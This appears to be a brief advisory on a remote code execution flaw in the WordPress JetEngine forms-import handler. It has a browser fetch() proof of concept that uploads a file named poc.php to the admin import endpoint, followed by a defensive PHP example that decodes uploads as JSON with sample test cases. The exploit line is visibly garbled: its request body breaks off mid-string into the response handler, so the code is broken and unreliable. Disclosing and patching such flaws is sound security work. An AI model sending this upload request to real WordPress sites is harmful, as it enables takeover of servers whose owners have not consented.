The plugin includes uploaded files without adequately ensuring that they are not executable, leading to a remote code execution vulnerability.
fetch("/wp-admin/admin.php?action=jet_engine_forms_import", { "headers": { "accept": "text/html", "content-type": "multipart/form-data; boundary=----WebKitFormBoundary5hcKRhxO2OVXJm3s" }, "body": "------WebKitFormBoundary5hcKRhxO2OVXJm3s\r\nContent-Disposition: form-data; name=\"form_file\"; filename=\"poc.php\"\r\nContent-Type: application/json\r\n\r\n response.text()).then((data) => console.log(data));
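One way an import handler can avoid this class of bug, shown as an added example that is not JetEngine's own code: the hypothetical helper `safe_read_form_export()` reads the upload and decodes it as JSON instead of including it, so a file like `poc.php` is never executed. The 1 MiB size limit, the nesting depth of 32 and the sample files are assumptions made for the demonstration.

```php
<?php
// Added example, not plugin code. safe_read_form_export() is a hypothetical helper.
// The upload is treated strictly as data: it is read and JSON-decoded,
// never passed to include/require, so PHP inside it cannot run.

function safe_read_form_export(string $tmp_path, string $client_name, int $max_bytes = 1048576): array
{
    // The client-supplied name is untrusted; use it only to reject obvious mismatches.
    if (strtolower(pathinfo($client_name, PATHINFO_EXTENSION)) !== 'json') {
        throw new InvalidArgumentException('Only .json exports are accepted.');
    }
    $size = filesize($tmp_path);
    if ($size === false || $size === 0 || $size > $max_bytes) {
        throw new InvalidArgumentException('Export file is empty or too large.');
    }
    $raw = file_get_contents($tmp_path);
    if ($raw === false) {
        throw new RuntimeException('Could not read the upload.');
    }
    // Decode as data. A PHP script is not valid JSON, so it fails here
    // regardless of the file name or the declared Content-Type.
    $data = json_decode($raw, true, 32, JSON_THROW_ON_ERROR);
    if (!is_array($data)) {
        throw new InvalidArgumentException('Export must be a JSON object or array.');
    }
    return $data;
}

// Constructed sample inputs: one benign export and two files carrying PHP source.
$cases = [
    'forms.json'   => '{"title":"Contact","fields":[{"name":"email"}]}',
    'poc.php'      => '<?php echo 1;',
    'renamed.json' => '<?php echo 1;',
];
foreach ($cases as $name => $body) {
    $tmp = tempnam(sys_get_temp_dir(), 'imp');
    file_put_contents($tmp, $body);
    try {
        $form = safe_read_form_export($tmp, $name);
        echo "$name: accepted, title=" . $form['title'] . "\n";
    } catch (Throwable $e) {
        echo "$name: rejected (" . get_class($e) . ")\n";
    } finally {
        unlink($tmp);
    }
}
```

In a WordPress handler this sits behind the usual `current_user_can()` and `check_admin_referer()` checks, with `is_uploaded_file()` applied to the temporary path before it is read.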